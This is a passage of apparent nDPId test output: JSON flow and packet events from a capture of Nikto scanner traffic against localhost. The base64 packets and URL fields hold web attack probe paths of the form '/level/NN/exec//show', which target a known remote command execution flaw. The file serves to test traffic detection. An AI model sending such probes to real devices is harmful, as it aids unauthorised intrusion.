(Nikto\/2.1.6) (Evasions:None) (Test:001327)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277708,"pkt":"AAAAAAAAAAAAAAAACABFAADI5e9AAEAGVj5\/AAABfwAAAcaEH5Dy8dz\/j320kYAYAED+vAAAAQEICp1m\/vOdZv7zR0VUIC9sZXZlbC84MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277709,"pkt":"AAAAAAAAAAAAAAAACABFAADIleJAAEAGpkt\/AAABfwAAAcaGH5A96Kz0htu5TYAYAED+vAAAAQEICp1m\/vWdZv71R0VUIC9sZXZlbC84Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277711,"pkt":"AAAAAAAAAAAAAAAACABFAADIwilAAEAGegR\/AAABfwAAAcaIH5AoWfs0DfPUMYAYAED+vAAAAQEICp1m\/vedZv73R0VUIC9sZXZlbC84My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277713,"pkt":"AAAAAAAAAAAAAAAACABFAADIsuZAAEAGiUd\/AAABfwAAAcaKH5B+eYvxDWxq9oAYAED+vAAAAQEICp1m\/vmdZv75R0VUIC9sZXZlbC84NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277715,"pkt":"AAAAAAAAAAAAAAAACABFAADIFWJAAEAGJsx\/AAABfwAAAcaMH5B2cix1DMITXYAYAED+vAAAAQEICp1m\/vudZv77R0VUIC9sZXZlbC84NS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277716,"pkt":"AAAAAAAAAAAAAAAACABFAADIj0FAAEAGrOx\/AAABfwAAAcaOH5BnL7Yrjj53uYAYAED+vAAAAQEICp1m\/vydZv78R0VUIC9sZXZlbC84Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277718,"pkt":"AAAAAAAAAAAAAAAACABFAADI9rtAAEAGRXJ\/AAABfwAAAcaQH5Cd5s+tew18QIAYAED+vAAAAQEICp1m\/v6dZv7+R0VUIC9sZXZlbC84Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277719,"pkt":"AAAAAAAAAAAAAAAACABFAADIwR1AAEAGexB\/AAABfwAAAcaSH5DFAfgO5Rn4M4AYAED+vAAAAQEICp1m\/v+dZv7\/R0VUIC9sZXZlbC84OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzUpDQoNCg=="} 